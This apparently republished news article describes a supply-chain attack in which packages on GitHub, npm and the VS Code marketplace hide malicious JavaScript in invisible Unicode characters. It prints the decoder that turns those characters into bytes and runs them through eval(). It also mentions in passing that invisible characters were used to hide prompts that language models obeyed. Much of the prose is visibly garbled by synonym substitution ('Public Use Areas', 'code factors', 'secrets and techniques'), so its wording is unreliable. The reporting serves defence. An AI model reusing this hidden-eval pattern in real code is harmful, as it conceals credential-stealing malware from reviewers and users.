Close Menu
    Facebook LinkedIn YouTube WhatsApp X (Twitter) Pinterest
    Trending
    • Portable water filter provides safe drinking water from any source
    • MAGA Is Increasingly Convinced the Trump Assassination Attempt Was Staged
    • NCAA seeks faster trial over DraftKings disputed March Madness branding case
    • AI Trusted Less Than Social Media and Airlines, With Grok Placing Last, Survey Says
    • Extragalactic Archaeology tells the ‘life story’ of a whole galaxy
    • Swedish semiconductor startup AlixLabs closes €15 million Series A to scale atomic-level etching technology
    • Republican Mutiny Sinks Trump’s Push to Extend Warrantless Surveillance
    • Yocha Dehe slams Vallejo Council over rushed casino deal approval process
    Facebook LinkedIn WhatsApp
    Times FeaturedTimes Featured
    Saturday, April 18
    • Home
    • Founders
    • Startups
    • Technology
    • Profiles
    • Entrepreneurs
    • Leaders
    • Students
    • VC Funds
    • More
      • AI
      • Robotics
      • Industries
      • Global
    Times FeaturedTimes Featured
    Home»News»Supply-chain attack using invisible code hits GitHub and other repositories
    News

    Supply-chain attack using invisible code hits GitHub and other repositories

    Editor Times FeaturedBy Editor Times FeaturedMarch 14, 2026No Comments3 Mins Read
    Facebook Twitter Pinterest Telegram LinkedIn Tumblr WhatsApp Email
    Share
    Facebook Twitter LinkedIn Pinterest Telegram Email WhatsApp Copy Link

    The invisible code is rendered with Public Use Areas (typically referred to as Public Use Entry), that are ranges within the Unicode specification for particular characters reserved for personal use in defining emojis, flags, and different symbols. The code factors characterize each letter of the US alphabet when fed to computer systems, however their output is totally invisible to people. Individuals reviewing code or utilizing static analysis instruments see solely whitespace or clean traces. To a JavaScript interpreter, the code factors translate into executable code.

    The invisible Unicode characters had been devised a long time in the past after which largely forgotten. That’s, till 2024, when hackers started utilizing the characters to hide malicious prompts fed to AI engines. Whereas the textual content was invisible to people and textual content scanners, LLMs had little hassle studying them and following the malicious directions they conveyed. AI engines have since devised guardrails which might be designed to limit utilization of the characters, however such defenses are periodically overridden.

    Since then, the Unicode approach has been utilized in extra conventional malware assaults. In one of many packages Aikido analyzed in Friday’s submit, the attackers encoded a malicious payload utilizing the invisible characters. Inspection of the code exhibits nothing. Throughout the JavaScript runtime, nonetheless, a small decoder extracts the true bytes and passes them to the eval() perform.

    const s = v => [...v].map(w => (
      w = w.codePointAt(0),
      w >= 0xFE00 && w <= 0xFE0F ? w - 0xFE00 :
      w >= 0xE0100 && w <= 0xE01EF ? w - 0xE0100 + 16 : null
    )).filter(n => n !== null);
    
    
    eval(Buffer.from(s(``)).toString('utf-8'));

    “The backtick string handed to s() appears empty in each viewer, but it surely’s filled with invisible characters that, as soon as decoded, produce a full malicious payload,” Aikido defined. “In previous incidents, that decoded payload fetched and executed a second-stage script utilizing Solana as a supply channel, able to stealing tokens, credentials, and secrets and techniques.”

    Since discovering the brand new spherical of packages on GitHub, the researchers have discovered comparable ones on npm and the VS Code market. Aikido stated the 151 packages detected are possible a small fraction unfold throughout the marketing campaign as a result of many have been deleted since first being uploaded.

    The easiest way to guard towards the scourge of supply-chain assaults is to rigorously examine packages and their dependencies earlier than incorporating them into initiatives. This contains scrutinizing bundle names and trying to find typos. If suspicions about LLM use are right, malicious packages could more and more look like authentic, significantly when invisible unicode characters are encoding malicious payloads.



    Source link

    Share. Facebook Twitter Pinterest LinkedIn Tumblr Email
    Editor Times Featured
    • Website

    Related Posts

    NCAA seeks faster trial over DraftKings disputed March Madness branding case

    April 18, 2026

    Yocha Dehe slams Vallejo Council over rushed casino deal approval process

    April 18, 2026

    CFTC’s one-man show gets awkward on the Hill as lawmakers hammer Selig on sports bets, staffing gaps and corruption claims

    April 17, 2026

    Maryland session ends leaving sweepstakes gaming bills stalled once again as SGLA celebrates

    April 17, 2026

    New York lawsuit says Stake and Coinbase targeted child gambler for years

    April 17, 2026

    Recent advances push Big Tech closer to the Q-Day danger zone

    April 17, 2026

    Comments are closed.

    Editors Picks

    Portable water filter provides safe drinking water from any source

    April 18, 2026

    MAGA Is Increasingly Convinced the Trump Assassination Attempt Was Staged

    April 18, 2026

    NCAA seeks faster trial over DraftKings disputed March Madness branding case

    April 18, 2026

    AI Trusted Less Than Social Media and Airlines, With Grok Placing Last, Survey Says

    April 18, 2026
    Categories
    • Founders
    • Startups
    • Technology
    • Profiles
    • Entrepreneurs
    • Leaders
    • Students
    • VC Funds
    About Us
    About Us

    Welcome to Times Featured, an AI-driven entrepreneurship growth engine that is transforming the future of work, bridging the digital divide and encouraging younger community inclusion in the 4th Industrial Revolution, and nurturing new market leaders.

    Empowering the growth of profiles, leaders, entrepreneurs businesses, and startups on international landscape.

    Asia-Middle East-Europe-North America-Australia-Africa

    Facebook LinkedIn WhatsApp
    Featured Picks

    GAMING: The Halloween edition of the best villains and why they’re sometimes misunderstood

    October 31, 2025

    Paris-based cryptography startup Zama secures €49 million to bring end-to-end encryption to public blockchains

    June 25, 2025

    World’s biggest EV battery maker sees shares jump on debut

    May 20, 2025
    Categories
    • Founders
    • Startups
    • Technology
    • Profiles
    • Entrepreneurs
    • Leaders
    • Students
    • VC Funds
    Copyright © 2024 Timesfeatured.com IP Limited. All Rights.
    • Privacy Policy
    • Disclaimer
    • Terms and Conditions
    • About us
    • Contact us

    Type above and press Enter to search. Press Esc to cancel.